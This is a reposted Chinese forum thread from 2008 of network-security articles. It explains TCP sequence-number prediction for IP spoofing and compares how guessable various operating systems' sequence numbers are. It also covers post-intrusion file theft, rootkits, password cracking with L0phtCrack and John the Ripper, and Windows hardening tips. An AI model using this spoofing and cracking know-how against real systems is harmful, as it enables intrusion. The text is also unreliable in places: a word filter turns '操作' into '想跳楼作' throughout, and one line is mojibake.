论坛风格切换
正版合作和侵权请联系 sd173@foxmail.com
 
  • 帖子
  • 日志
  • 用户
  • 版块
  • 群组
帖子
购买邀请后未收到邀请联系sdbeta@qq.com
  • 87904阅读
  • 68回复

[求助-软件问题]黑客进阶篇——全部认真的看完,不想成为高手都不行 [复制链接]

上一主题 下一主题
离线胡可
发帖
*
今日发帖
最后登录
1970-01-01
只看该作者 30 发表于: 2008-06-14 22:41:28
网络安全知识(4)

看一下X是如何猜出ISNs : 

   a、首先, X发送一个SYN包来获取服务器现在的ISNs

     X ---〉S: (ISNx)

     S ---〉X: ACK(ISNx)+ ISNs# (1)

   b、紧接着,X冒充T向服务器发送SYN包

        X ---〉S: SYN(ISNx ) , SRC = T (2)

   c、于是,服务器发出一个响应包给T(这个包X是收不到的)

     S ---〉T: SYN(ISNs$) , ACK(ISNT ) (3)

   d、X计算ISNs$:

       ISNs$ = ISNs# + RTT×Increment of ISN (4)

  其中,RTT(Round Trip Time),是一个包往返X和S所用的时间,可以通过Ping 来得到。



  上图显示了round trip times (RTT) 大概是0。

  Increment of ISN是协议栈的初始序列号每秒钟增加的值,以Unix为例,当没有外部连接发生时,服务器的ISN每秒增加128,000,有连接的时候,服务器的ISN每秒增加64,000。

   e、于是,

    X ---> S : ACK(ISNs$)   (冒充可信主机成功了)

    X ---> S : 恶意的命令或窃取机密消息的命令

  在评价以下的解决方案时有几点要注意:

  1.该解决方案是否很好地满足TCP的稳定性和可想跳楼作性的要求?
  2.该解决方案是否容易实现?
  3.该解决方案对性能的影响如何?
  4.该解决方案是否经得起时间的考验?

  以下的几种方案各有各的优点和缺点,它们都是基于增强ISN生成器的目标提出的。

  配置和使用密码安全协议

  TCP的初始序列号并没有提供防范连接攻击的相应措施。TCP的头部缺少加密选项用于强加密认证,于是,一种叫做IPSec的密码安全协议的技术提出了。IPSec提供了一种加密技术(End to end cryptographic),使系统能验证一个包是否属于一个特定的流。这种加密技术是在网络层实现的。其它的在传输层实现的解决方案(如 SSL/TLS和SSH1/SSH2), 只能防止一个无关的包插入一个会话中,但对连接重置(拒绝服务)却无能为力,原因是因为连接处理是发生在更低的层。IPSec能够同时应付着两种攻击(包攻击和连接攻击)。它直接集成在网络层的安全模型里面。

  上面的解决方案并不需要对TCP协议做任何得修改,RFC2385(“基于TCP MD5签名选项的BGP会话保护)和其他的技术提供了增加TCP头部的密码保护,但是,却带来了收到拒绝服务攻击和互想跳楼作性和性能方面的潜在威胁。使用加密安全协议有几个优于其它方案的地方。TCP头部加密防止了Hijacking和包扰乱等攻击行为,而TCP层仍然能够提供返回一个简单增加ISN的机制,使方案提供了最大程度的可靠性。但实现IPSec非常复杂,而且它需要客户机支持,考虑到可用性,许多系统都选择使用RFC 1948。

  使用RFC1948

  在RFC1948中,Bellovin提出了通过使用4-tuples的HASH单向加密函数,能够使远程攻击者无从下手(但不能阻止同一网段的攻击者通过监听网络上的数据来判断ISN)。

  Newsham 在他的论文 [ref_newsham]中提到:

  RFC 1948 [ref1]提出了一种不容易攻击(通过猜测)的TCP ISN的生成方法。此方法通过连接标识符来区分序列号空间。每一个连接标识符由本地地址,本地端口,远程地址,远程端口来组成,并由一个函数计算标识符分的序列号地址空间偏移值(唯一)。此函数不能被攻击者获得,否则,攻击者可以通过计算获得ISN。于是,ISN就在这个偏移值上增加。ISN的值以这种方式产生能够抵受上面提到的对ISN的猜测攻击。

  一旦全局ISN空间由上述方法来生成,所有的对TCP ISN的远程攻击都变得不合实际。但是,需要指出的,即使我们依照RFC 1948来实现ISN的生成器,攻击者仍然可以通过特定的条件来获得ISN(这一点在后面叙述).

  另外,用加密的强哈希算法(MD5)来实现ISN的生成器会导致TCP的建立时间延长。所以,有些生成器(如Linux kernel )选择用减少了轮数的MD4函数来提供足够好的安全性同时又把性能下降变得最低。削弱哈希函数的一个地方是每几分钟就需要对生成器做一次re-key 的处理,经过了一次re-key的处理后,安全性提高了,但是,RFC793提到的可靠性却变成另一个问题。

  我们已经知道,严格符合RFC1948的ISN生成方法有一个潜在的危机:

  一个攻击者如果以前合法拥有过一个IP地址,他通过对ISN进行大量的采样,可以估计到随后的ISN的变化规律。在以后,尽管这个IP地址已经不属于此攻击者,但他仍然可以通过猜测ISN来进行IP欺骗。

  以下,我们可以看到RFC 1948的弱点:

  ISN = M + F(sip, sport, dip, dport,

  )

  其中

  ISN 32位的初始序列号

  M 单调增加的计数器

  F 单向散列哈希函数 (例如 MD4 or MD5)

  sip 源IP地址

  sport 源端口

  dip 目的IP地址

  dport 目的端口

  哈希函数可选部分,使远程攻击者更难猜到ISN.

  ISN自身的值是按照一个常数值稳定增加的,所以F()需要保持相对的稳定性。而根据Bellovin 所提出的,是一个系统特定的值(例如机器的启动时间,密码,初始随机数等),这些值并不 会经常变。

  但是,如果Hash函数在实现上存在漏洞(我们无法保证一个绝对安全的Hash函数,况且,它的实现又与想跳楼作系统密切相关),攻击者就可以通过大量的采样,来分析,其中,源IP地址,源端口,目的IP地址,目的端口都是不变的,这减少了攻击者分析的难度。

  Linux TCP的ISN生成器避免了这一点。它每5分钟计算一次值,把泄漏的风险降到了最低。

  有一个办法可以做的更好:

  取M = M + R(t)

  ISN = M + F(sip, sport, dip, dport, )

  其中

  R(t) 是一个关于时间的随机函数

  很有必要这样做,因为它使攻击者猜测ISN的难度更大了(弱点在理论上还是存在的)。
其它一些方法

  构造TCP ISN生成器的一些更直接的方法是:简单地选取一些随机数作为ISN。这就是给定一个32位的空间,指定 ISN = R(t)。(假设R()是完全的非伪随机数生成函数)

  固然,对于完全随机的ISN值,攻击者猜测到的可能性是1/232是,随之带来的一个问题是ISN空间里面的值的互相重复。这违反了许多RFC (RFC 793, RFC 1185, RFC 1323, RFC1948等)的假设----ISN单调增加。这将对TCP协议的稳定性和可靠性带来不可预计的问题。

  其它一些由Niels Provos(来自OpenBSD 组织)结合完全随机方法和RFC 1948解决方案:

  ISN = ((PRNG(t)) << 16) + R(t)     32位

  其中

  PRNG(t) :一组随机指定的连续的16位数字  0x00000000 -- 0xffff0000

  R(t) :16位随机数生成器(它的高位m**设成0)0x00000000 -- 0x0000ffff

  上面的公式被用于设计OpenBsd的ISN生成器,相关的源代码可以从下面的网址获得

http://www.openbsd.org/cgi-bin/cvsweb/src/...inet/tcp_subr.c

  Provos的实现方法有效地生成了一组在给定时间内的不会重复的ISN的值,每两个ISN值都至少相差32K,这不但避免了随机方法造成的ISN的值的冲突,而且避免了因为哈希函数计算带来的性能上的下降,但是,它太依赖于系统时钟,一旦系统时钟状态给攻击者知道了,就存在着系统的全局ISN状态泄密的危机。

  TCP ISN生成器的构造方法的安全性评估

  ISN与PRNGs(伪随机数生成器)

  我们很难用一台计算机去生成一些不可预测的数字,因为,计算机被设计成一种以重复和准确的方式去执行一套指令的机器。所以,每个固定的算法都可以在其他机器上生成同样的结果。如果能够推断远程主机的内部状态,攻击者就可以预测它的输出;即使不知道远程主机的PNRG函数,但因为算法最终会使ISN回绕,按一定的规律重复生成以前的ISN,所以,攻击者仍然可以推断ISN。幸运的是,目前条件下,ISN的重复可以延长到几个月甚至几年。但是,仍然有部分PRNG生成器在产生500个元素后就开始回绕。解决伪随机数的方法是引入外部随机源,击键延时,I/O中断,或者其它对攻击者来说不可预知的参数。把这种方法和一个合理的HASH函数结合起来,就可以产生出32位的不可预知的TCP ISN的值,同时又隐蔽了主机的PNRG的内部状态。不幸的是,很少的TCP ISN产生器是按这种思路去设计的,但即使是这样设计的产生器,也会有很多的实现上的漏洞使这个产生器产生的ISN具有可猜测性。

  RFC1948的建议提供了一种比较完善的方法,但是,对攻击者来说,ISN仍然存在着可分析性和猜测性。其中,PRNG的实现是个很关键的地方。
离线胡可
发帖
*
今日发帖
最后登录
1970-01-01
只看该作者 31 发表于: 2008-06-14 22:41:40
网络安全知识(5)

  Spoofing 集合

  需要知道一点是,如果我们有足够的能力能够同时可以发出232个包,每个包由不同的ISN值,那么,猜中ISN的可能性是100%。但是,无论从带宽或计算机的速度来说都是不实际的。但是,我们仍然可以发大量的包去增加命中的几率,我们把这个发出的攻击包的集合称为Spoofing集合。通常,从计算机速度和网络数据上传速率两方面来考虑,含5000个包的Spoofing的集合对众多的网络用户是没有问题的,5000-60000个包的 Spoofing集合对宽带网的用户也是不成问题的,大于60000个包的Spoofing集合则超出一般攻击者的能力。网络的速度和计算机性能的不断增加会提高那种使用穷尽攻击方法猜测ISN的成功率。从攻击者的立场,当然希望能够通过定制一个尽可能小的Spoofing集合,而命中的几率又尽可能高。我们假定我们攻击前先收集50000个包作为ISN值的采样,然后,我们把这些ISN用作对将来的ISN的值猜测的依据。
  一种称为“delay coordinates”的分析方法

  在动态系统和非线性系统中,经常使用一种叫做“delay coordinates”的分析法,这种方法使我们可以通过对以前的数据的采样分析来推想以后的数据。

  我们试图以建立一个三维空间(x,y,z)来观察ISN值(seq[t])的变化,其中t取0,1,2, ……


  方程组(E1)

  现在,对采样了的50000个ISN序列seq[t] 按照上面的三个方程式来构建空间模型A。这样,就可以通过A的图像特征来分析这个PNRG生成的ISN值的规律。A呈现的空间模型的3D特性越强,它的可分析性就越好。

  接着,我们根据这个模型,去分析下一个ISN值seq[t],为此,我们用一个集合K(5000个)去猜测seq[t]。

  如果我们知道seq[t-1],要求seq[t],那么,可以通过在这个三维空间中找出一个有良好特性的节点P(x,y,z),将P.x+seq[t -1],我们就可以得到seq[t]。现在,我们将注意力放到怎样在这个三维空间中选择一些点来构成Spoofing集合,也就是怎样通过seq[t- 1],seq[t-2],sea[t-3]来推知seq[t]。

  由于seq[t-1],seq[t-2],seq[t-3]都可以很容易地在远程主机上探测到,于是,P.y和P.z可以通过以下的公式求出
  而对于P.x=seq[t]-seq[t-1], 由于seq[t-1]已知,所以,我们可以把它当作是空间的一条直线。如果,在对以前的ISN的采样,通过上面提到的构成的空间模型A呈现某种很强的特征,我们就可以大胆地假设,seq[t]在直线与A的交点上,或者在交点的附近。这样,seq[t]就这样确定了,于是,seq[t+1],seq[t+ 2]……,我们都可以推断出来。


  于是,我们大致将构造Spoofing集合分成3个步骤: 

  先选取L与A交点之间的所有点。如果,L与A没有交点,我们则选取离L最近的A的部分点。

  假设现在 seq[t-1]=25

   seq[t-2]=50

   seq[t-3]=88

   于是,我们可以计算出

   y = seq[t-1] - seq[t-2]=25

   z = seq[t-2] - seq[t-3]=33

  而我们在集合A中找不到满足y=25,z=33这个点,但是,我们找到y=24,z=34和y=27,z=35这两个点,所以,我们要把它们加入Spoofing集合。

  我们按照上面的方法,把在A附近(半径<=R1的空间范围内)点集M找出来,然后,我们根据这些点的相应的x值去推导相应的seq[t](按照一定的算法,后面会提到),于是,我们就得到很多的seq[t]。

  根据点集M(j),我们在一定的变化浮动范围U里(-R2<=U<=+R2)处理其x值,得出以下的集合K:

  M(j).x+1 M(j).x-1 M(j).x+2 M(j).x-2 M(j).x+3 M(j).x-3 …… M(j).x+R2 M(j)-R2

  接着我们确定R1和R2的值

      R1值的选取的原则:使M不为空集,一般为1-500个。

      R2值的选取的原则:使K的个数为5000。

  相关系数的意义:

  R1 radius: 影响搜索速度。

  R2 radius: 影响猜测ISN的成功率, R2越大,成功率越高,但代价越大。

  Average error: 反映了在3.3.2中找出的点集的平均距离。一个过分大的平均距离是不需要的。可以通过是否有足够的正确的猜测值来计算Average error。
离线胡可
发帖
*
今日发帖
最后登录
1970-01-01
只看该作者 32 发表于: 2008-06-14 22:41:58
网络安全知识(6)

delay coordinates分析法的意义

  站在攻击者的立场,他是千方百计地想缩小搜索空间,他希望先搜索一些最可能的值,然后再去搜索其它可能性没那么大的值。通过delay coordinates,他可以看去观察ISN数列的特征,如果,按照上面的方法构造的空间模型A呈现很明显的空间轮廓,如一个正方体,一个圆柱体,或者一个很小的区域,那么ISN很可能就是这个空间模型A中的一点,搜索空间就会可以从一个巨大的三维空间缩小到一个模型A。看一下一个设计得很好的PRNG (输出为32位):...2179423068, 2635919226, 2992875947, 3492493181, 2448506773, 2252539982, 2067122333, 1029730040, 335648555, 427819739...


  RFC 1948要求我们用31位的输出,但是,32位的搜索空间比31位的要大一倍,所以,在后面的PRNG的设计中,我采用了32位的输出。

?牎 ∠旅妫?我们来看一下各种典型的空间模型以及对它们的评价。



  从空间特性可以看出,某些区域的值互相重叠,某些地方的空间形状很明显,呈针状型,这种PRNG设计得不好,重叠特性很强,攻击者可以从左图分析推断可能性比较大的重叠区域去搜索,这样可以大大减少搜索的难度。



  这种PRNG参杂了一些可以预测的随机种子,导致空间模型呈现很明显的片状。攻击者可以根据前面的一些ISN来推测后面的ISN。


  这种PRNG产生的随机数序列之间的差值非常小,但是,它的分布特性非常好。所以,虽然,它并没有扩展到整个空间,但是,它比上面几种模型要好的多。攻击者攻击的成功率要少得多。


  这个PRNG是以计算机时钟为随机源的。它的ISN值都分布在三个很明显的面上。三个面都在模型的中间有一个汇聚点。这样的PRNG设计的非常差,所以,我们在设计PRNG的时候,不能只是以时钟作为随机源。

各种想跳楼作系统的TCP ISN生成器的安全性比较

  Windwos 98 SE


  但很难明白为什么Windows 98的算法更弱。我们看到R1为0,也就是说,A的空间特性太明显,以致M集只需要一个点就可以算出seq[t]。我们看到,Windows 98的R2小于Windows 95的R2,换言之,Windows 98的seq[t]的搜索代价更少。

  Windows NT4 SP3,Windows SP6a和Windows 2000


  Windows NT4 SP3在ISN的PNRG算法也是非常弱的,成功率接近100%。Windows 2000和Windows NT4 SP6a的TCP 序列号有着相同的可猜测性。危险程度属于中到高的范围。虽然,我们在图上看不到很明显的3D结构化特征,但是,12%和15%对攻击者来说,已经是一个很满意的结果。

  FreeBSD 4.2,OpenBSD 2.8和OpenBSD-current



  OpenBSD-current的PRNG 输出为31-bit,也就是说,△seq[t]的值域范围可以是231 –1,意味着,y,z值域也很大,这对使我们很难确定M集,经过我们的处理后,可以看到一个云状物(见上图),它的R1半径很大,而且分布均匀,不呈现任何的空间结构化特性,很难对它进行分析。

  Linux 2.2


  Linux 2.2的TCP/IP序列号的可分析性也是很少,比起OpenBSD-current,它的PRNG的输出宽度只有24bit,但是,对抵御攻击已经足够了。Linux是按照RFC 1948规范的。它的HASH函数从实现来说,应该是没有什么的漏洞,而且,它应该是引入了外部随机源。

  Solaris

  Solaris的内核参数tcp_strong_iss有三个值,当tcp_strong_iss=0时,猜中序列号的成功率是100%;当tcp_strong_iss=1时,Solaris 7和Solaris 8一样,都能产生一些特性相对较好的序列号。


  tcp_strong_iss=2时,依据Sun Microsystem的说法,系统的产生的ISN值非常可靠,不可预测。通过观察采样值的低位值的变化,可以相信它的PRNG的设计采用了RFC 1948规范,正如Solaris的白皮书所提到的。


  但是,我们观察到,Solaris7(tcp_strong_iss=2)虽然使用了RFC 1948,但是,仍然相当的弱,究其原因,是因为Solaris没有使用外部随机源,而且也没有在一段时间之后重算

。由一些Solaris系统动态分配IP地址的主机群要特别小心,因为Solaris在启动之后,一直都不会变(这一点与Linux不同),于是,攻击者在合法拥有某个IP地址的时候,他可以在TCP会话期间对序列号进行大量的采样,然后,当这个IP地址又动态地分配给其他人的时候,他就可以进行攻击(在 Clinet-Server结构的网络系统中要尤为注意,因为,许多应用都是分配固定的端口进行通讯)。
获得信息

  一旦攻击者获得root的权限,他将立即扫描服务器的存储信息。例如,在人力资源数据库中的文件,支付账目数据库和属于上层管理的终端用户系统。在进行这一阶段的控制活动时,攻击者在脑海中已经有明确的目标。这一阶段的信息获取比侦查阶段的更具有针对性,该信息只会导致重要的文件和信息的泄漏。这将允许攻击者控制系统。

  攻击者获得信息的一种方法是想跳楼纵远程用户的Web浏览器。大多数的公司并没有考虑到从HTTP流量带来的威胁,然而,Web浏览器会带来很严重的安全问题。这种问题包括Cross-frame browsing bug和Windows spoofing以及Unicode等。浏览器容易发生缓冲区溢出的问题,允许攻击者对运行浏览器的主机实施拒绝服务攻击。一旦攻击者能够在局部使系统崩溃,他们便可以运行脚本程序来渗透和控制系统。

  Cross-frame browsing bug允许怀有恶意的Web站点的制作者创建可以从用户计算机上获得信息的Web页面。这种情况出现在4.x和5.x版本的Netscape和 Microsoft浏览器上,这种基于浏览器的问题只会发生在攻击者已经知道文件和目录的存储位置时。这种限制看起来不严重,但实际上并非如此。其实,任何攻击者都清楚地知道缺省情况下UNIX想跳楼作系统的重要文件存放在(\etc)目录下,Windows NT的文件在(\winnt)目录下,IIS在(\inetpub\wwwroot)目录下等等。
离线胡可
发帖
*
今日发帖
最后登录
1970-01-01
只看该作者 33 发表于: 2008-06-14 22:42:18
网络安全知识(7)

大多数的攻击者都知道想跳楼作系统存放文件的缺省位置。如果部门的管理者使用Windows98想跳楼作系统和Microsoft Word, Excel或Access,他很可能使用\deskto\My documents目录。攻击者同样知道\windows\start\menu\programs\startup目录的重要性。攻击者可能不知道谁在使用想跳楼作系统或文件和目录的布局情况。通过猜测电子表格,数据库和字处理程序缺省存储文件的情况,攻击者可以轻易地获得信息。

  虽然攻击者无法通过浏览器控制系统,但这是建立控制的第一步。利用Cross-frame browsing bug获得的信息要比从网络侦查和渗透阶段获得的信息更详细。通过阅读文件的内容,攻击者会从服务器上获得足够的信息,要想阻止这种攻击手段,系统管理员必须从根本上重新配置服务器。

  审计UNIX文件系统

  Root kit充斥在互联网上,很难察觉并清除它们。从本质上来说,root kit是一种木马。大多数的root kit用各种各样的侦查和记录密码的程序替代了合法的ls,su和ps程序。审计这类程序的最好方法是检查象ls, su和ps等命令在执行时是否正常。大多数替代root kit的程序运行异常,或者有不同的的文件大小。在审计UNIX系统时,要特别注意这些奇怪的现象。下表1列出了常见的UNIX文件的存放位置。

文件名
存放位置

/
根目录

/**in
管理命令

/bin
用户命令;通常符号连接至/usr/bin

/usr
大部分想跳楼作系统

/usr/bin
大部分系统命令

/usr/local
本地安装的软件包

/usr/include
包含文件(用于软件开发)

/usr/src
源代码

/usr/local/src
本地安装的软件包的源代码

/usr/**in
管理命令的另一个存放位置

/var
数据(日志文件,假脱机文件)

/vr/log
日志文件

/export
被共享的文件系统

/home
用户主目录

/opt
可选的软件

/tmp
临时文件

/proc
虚拟的文件系统,用来访问内核变量


  审计Windows NT

  下列出了在Windows NT中通常文件的存放位置

文件名
位置

\winnt
系统文件目录;包含regedit.exe和注册表日志

\winnt\system32
包含许多子目录,包括config(存放security.log,event.log和application.log文件)

\winnt\profiles
存放与所有用户相关的信息,包括管理配置文件

\winnt\system32\config
包含SAM和SAM.LOG文件,NT注册表还包含密码值

\inetpub
缺省情况下,包含IIS4.0的文件,包括\ftproot,\wwwroot

\program files
服务器上运行的大多数程序的安装目录


  L0phtCrack工具

  L0phtCrack被认为是对系统攻击和防御的有效工具。它对于进行目录攻击和暴力攻击十分有效。它对于破解没有使用像!@#¥%^&*()等特殊字符的密码非常迅速。L0phtCrack可以从http://www.l0pht.com上获得。

  L0pht使用文字列表对密码进行字典攻击,如果字典攻击失败,它会继续使用暴力攻击。这种组合可以快速获得密码。L0pht可以在各种各样的情况下工作。你可以指定IP地址来攻击Windows NT系统。然而,这种方式需要首先登录到目标机器。L0pht还可以对SAM数据库文件进行攻击。管理员从\winnt\repair目录拷贝出SAM账号数据库。第三中方式是配置运行L0pht的计算机嗅探到密码。L0pht可以监听网络上传输的包含密码的会话包,然后对其进行字典攻击。这种方式使用 L0pht需要在类似Windows NT这样的想跳楼作系统之上,并且你还需要物理地处于传输密码的两个想跳楼作系统之间。

  John the Ripper和Crack是在基于UNIX的想跳楼作系统上常见的暴力破解密码的程序。这两个工具被用来设计从UNIX上获取密码。所有版本的UNIX想跳楼作系统都将用户账号数据库存放在/etc/passwd或/etc/shadow文件中。这些文件在所有UNIX系统中存放在相同的位置。为了使 UNIX正常运行,每个用户都必须有读取该文件的权限。

  John the Ripper和Crack是最常见的从shadow和passwd文件中获得密码的程序。这些工具将所有的密码组合与passwd或shadow文件中加密的结果进行比较。一旦发现有吻合的结果就说明找到了密码。

  在你审计UNIX想跳楼作系统时,请注意类似的问题。虽然许多扫描程序,如NetRecon和ISS Internet Scanner可以模仿这种工具类型,许多安全专家还是使用像L0pht和John the Ripper来实施审计工作。

  信息重定向

  一旦攻击者控制了系统,他便可以进行程序和端口转向。端口转向成功后,他们可以想跳楼控连接并获得有价值的信息。例如,有些攻击者会禁止像FTP的服务,然后把FTP的端口指向另一台计算机。那台计算机会收到所有原来那台主机的连接和文件。

  相似的攻击目标还包括重定向SMTP端口,它也允许攻击者获得重要的信息。例如,攻击者可以获得所有使用SMTP来传送E-mail账号的电子商务服务器的信息。即使这些传输被加密,攻击者还是可以获得这些传输的信息并用字典攻击这些信息。

  通常,攻击者渗透你的想跳楼作系统的目的是通过它来渗透到网络上其它的想跳楼作系统。例如,NASA服务器是攻击者通常的攻击目标,不仅因为他们想要获取该服务器上的信息,更主要的是许多组织都和该服务器有信任的连接关系,比如Department of Defense。

  因此,许多情况下,攻击者希望攻击其它的系统。为了防止类似的情况发生,美国政府要求那些直接连到政府部门的公司必须按照Rainbow Series的标准来实施管理。从1970年开始,该系列标准帮助系统确定谁可以安全的连接。这个系列中最长被使用的是Department of Defense Trusted Computer System Evaluation Criteria,该文件被成为Orange Book。例如,C2标准是由Orange Book衍生出来并被用来实施可以信任的安全等级。这个等级是C2管理服务(C2Config.exe)在Microsoft NT的服务补丁基础上提供的。
  控制方法

  新的控制方法层出不穷,原因有以下几个。首先是因为系统的升级不可避免的会开启新的安全漏洞,二是少数黑客极有天赋,他们不断开发出新的工具。大多数的UNIX想跳楼作系统都有C语言的编译器,攻击者可以建立和修改程序。这一部分讨论一些允许你控制系统的代表性程序。

  系统缺省设置

  缺省设置是指计算机软硬件“Out-of-the-box”的配置,便于厂商技术支持,也可能是因为缺乏时间或忽略了配置。攻击者利用这些缺省设置来完全控制系统。虽然改变系统的缺省设置非常容易,但许多管理员却忽视了这种改变。其实,改变缺省设置可以极大地增强想跳楼作系统的安全性。

  合法及非法的服务,守护进程和可装载的模块

  Windows NT运行服务,UNIX运行守护进程,Novell想跳楼作系统运行可装载的模块。这些守护进程可以被用来破坏想跳楼作系统的安全架构。例如, Windows NT的定时服务以完全控制的权限来执行。如果用户开启了定时服务,他就有可能运行其它的服务,(例如,域用户管理器),从而使用户更容易控制系统
离线胡可
发帖
*
今日发帖
最后登录
1970-01-01
只看该作者 34 发表于: 2008-06-14 22:42:39
防范非系统用户破坏

第一招:屏幕保护



在Windows中启用了屏幕保护之后,只要我们离开计算机(或者不想跳楼作计算机)的时间达到预设的时间,系统就会自动启动屏幕保护程序,而当用户移动鼠标或敲击键盘想返回正常工作状态时,系统就会打开一个密码确认框,只有输入正确的密码之后才能返回系统,不知道密码的用户将无法进入工作状态,从而保护了数据的安全。



提示:部分设计不完善的屏幕保护程序没有屏蔽系统的“Ctrl+Alt+Del”的组合键,因此需要设置完成之后测试一下程序是否存在这个重大Bug。



不过,屏幕保护最快只能在用户离开1分钟之后自动启动,难道我们必须坐在计算机旁等待N分钟看到屏幕保护激活之后才能再离开吗?其实我们只要打开 Windows安装目录里面的system子目录,然后找到相应的屏幕保护程序(扩展名是SCR),按住鼠标右键将它们拖曳到桌面上,选择弹出菜单中的 “在当前位置创建快捷方式”命令,在桌面上为这些屏幕保护程序建立一个快捷方式。此后,我们在离开计算机时双击这个快捷方式即可快速启动屏幕保护。



第二招:巧妙隐藏硬盘



在“按Web页”查看方式下,进入Windows目录时都会弹出一句警告信息,告诉你这是系统文件夹如果“修改该文件夹的内容可能导致程序运行不正常,要查看该文件夹的内容,请单击显示文件”,这时单击“显示文件”就可以进入该目录了。原因是在Windows根目录下有desktop.ini和 folder.htt两个文件作祟。将这两个文件拷贝到某个驱动器的根目录下(由于这两个文件是隐藏文件,之前必须在文件夹选项中单击“查看”标签,选择 “显示所有文件”,这样就可以看见这两个文件了)。再按“F5”键刷新一下,看看发生了什么,是不是和进入Windows目录时一样。



接下来我们用“记事本”打开folder.htt,这是用HTML语言编写的一个文件,发挥你的想像力尽情地修改吧。如果你不懂HTML语言也没关系,先找到“显示文件”将其删除,找到“修改该文件夹的内可能导致程序运行不正常,要查看该文件夹的内容,请单击显示文件”,将其改为自己喜欢的文字,例如“安全重地,闲杂人等请速离开”(如图1),将“要查看该文件夹的内容,请单击”改为“否则,后果自负!”,接着向下拖动滑块到倒数第9行,找到 “(file&://%TEMPLATEDIR%\wvlogo.gif)”这是显示警告信息时窗口右下角齿轮图片的路径,将其改为自己图片的路径,例如用“d:\tupian\tupian1.jpg”替换“//”后面的内容,记住这里必须将图片的后缀名打出,否则将显示不出图片。当然,你还可以用像Dreamweaver、FrontPage这样的网页工具做出更好的效果,然后只要将原文件拷贝到下面这段文字的后面,覆盖掉原文件中“~”之间的内容就可以了。



*This file was automatically generated by Microsoft Internet EXPlorer 5.0



*using the file %THISDIRPATH%\folder.htt.



保存并退出,按“F5”键刷新一下,是不是很有个性?接下来要作的就是用“超级兔子”将你所要的驱动器隐藏起来,不用重新启动就可以欣赏自己的作品了。最后告诉大家一招更绝的,就是干脆将folder.htt原文件中“~”之间的内容全部删除,这样就会给打开你的驱动器的人造成一种这是一个空驱动器的假象,使其中的文件更安全。







图1



第三招:禁用“开始”菜单命令



在Windows 2000/XP中都集成了组策略的功能,通过组策略可以设置各种软件、计算机和用户策略在某种方面增强系统的安全性。运行“开始→运行”命令,在“运行” 对话框的“打开”栏中输入“gpedit.msc”,然后单击“确定”按钮即可启动Windows XP组策略编辑器。在“本地计算机策略”中,逐级展开“用户配置→管理模板→任务栏和开始菜单”分支,在右侧窗口中提供了“任务栏”和“开始菜单”的有关策略。



在禁用“开始”菜单命令的时候,在右侧窗口中,提供了删除“开始”菜单中的公用程序组、“我的文档”图标、“文档”菜单、“网上邻居”图标等策略。清理“开始”菜单的时候只要将不需要的菜单项所对应的策略启用即可,比如以删除“我的文档”图标为例,具体想跳楼作步骤为:



1)在策略列表窗口中用鼠标双击“从开始菜单中删除我的文档图标”选项。



2)在弹出窗口的“设置”标签中,选择“已启用”单选按钮,然后单击“确定”即可。



第四招:桌面相关选项的禁用



Windows XP的桌面就像你的办公桌一样,有时需要进行整理和清洁。有了组策略编辑器之后,这项工作将变得易如反掌,只要在“本地计算机策略”中展开“用户配置→管理模板→桌面”分支,即可在右侧窗口中显示相应的策略选项。



1)隐藏桌面的系统图标



倘若隐藏桌面上的系统图标,传统的方法是通过采用修改注册表的方式来实现,这势必造成一定的风险性,采用组策略编辑器,即可方便快捷地达到此目的。



若要隐藏桌面上的“网上邻居”和“Internet EXPlorer”图标,只要在右侧窗口中将“隐藏桌面上网上邻居图标”和“隐藏桌面上的Internet EXPlorer图标”两个策略选项启用即可。如果隐藏桌面上的所有图标,只要将“隐藏和禁用桌面上的所有项目”启用即可。当启用了“删除桌面上的我的文档图标”和“删除桌面上的我的电脑图标”两个选项以后,“我的电脑”和“我的文档”图标将从你的电脑桌面上消失了。如果在桌面上你不再喜欢“回收站”这个图标,那么也可以把它给删除,具体方法是将“从桌面删除回收站”策略项启用。



2)禁止对桌面的某些更改



如果你不希望别人随意改变计算机桌面的设置,请在右侧窗口中将“退出时不保存设置”这个策略选项启用。当你启用这个了设置以后,其他用户可以对桌面做某些更改,但有些更改,诸如图标和打开窗口的位置、任务栏的位置及大小在用户注销后都无法保存。



第五招:禁止访问“控制面板”



如果你不希望其他用户访问计算机的控制面板,你只要运行组策略编辑器,并在左侧窗口中展开“本地计算机策略→用户配置→管理模板→控制面板”分支,然后将右侧窗口的“禁止访问控制面板”策略启用即可。



此项设置可以防止控制面板程序文件的启动,其结果是他人将无法启动控制面板或运行任何控制面板项目。另外,这个设置将从“开始”菜单中删除控制面板,同时这个设置还从Windows资源管理器中删除控制面板文件夹。



提示:如果你想从上下文菜单的属性项目中选择一个“控制面板”项目,会出现一个消息,说明该设置防止这个想跳楼作。



第六招:设置用户权限



当多人共用一台计算机时,在Windows XP中设置用户权限,可以按照以下步骤进行:



1)运行组策略编辑器程序。



2)在编辑器窗口的左侧窗口中逐级展开“计算机配置→Windows设置→安全设置→本地策略→用户权限指派”分支。



3)双击需要改变的用户权限,单击“添加用户或组”按钮,然后双击想指派给权限的用户账号,最后单击“确定”按钮退出。



第七招:文件夹设置审核



Windows XP可以使用审核跟踪用于访问文件或其他对象的用户账户、登录尝试、系统关闭或重新启动以及类似的事件,而审核文件和NTFS分区下的文件夹可以保证文件和文件夹的安全。为文件和文件夹设置审核的步骤如下:



1)在组策略窗口中,逐级展开右侧窗口中的“计算机配置→Windows设置→安全设置→本地策略”分支,然后在该分支下选择“审核策略”选项。



2)在右侧窗口中用鼠标双击“审核对象访问”选项,在弹出的“本地安全策略设置”窗口中将“本地策略设置”框内的“成功”和“失败”复选框都打上勾选标记(如图2),然后单击“确定”按钮。



3)用鼠标右键单击想要审核的文件或文件夹,选择弹出菜单的“属性”命令,接着在弹出的窗口中选择“安全”标签。



4)单击“高级”按钮,然后选择“审核”标签。



5)根据具体情况选择你的想跳楼作:



倘若对一个新组或用户设置审核,可以单击“添加”按钮,并且在“名称”框中键入新用户名,然后单击“确定”按钮打开“审核项目”对话框。



要查看或更改原有的组或用户审核,可以选择用户名,然后单击“查看/编辑”按钮。



要删除原有的组或用户审核,可以选择用户名,然后单击“删除”按钮即可。



6)如有必要的话,在“审核项目”对话框中的“应用到”列表中选取你希望审核的地方。



7)如果想禁止目录树中的文件和子文件夹继承这些审核项目,选择“仅对此容器内的对象和/或容器应用这些审核项”复选框。



注意:必须是管理员组成员或在组策略中被授权有“管理审核和安全日志”权限的用户可以审核文件或文件夹。在Windows XP审核文件、文件夹之前,你必须启用组策略中“审核策略”的“审核对象访问”。否则,当你设置完文件、文件夹审核时会返回一个错误消息,并且文件、文件夹都没有被审核
离线胡可
发帖
*
今日发帖
最后登录
1970-01-01
只看该作者 35 发表于: 2008-06-14 22:42:52
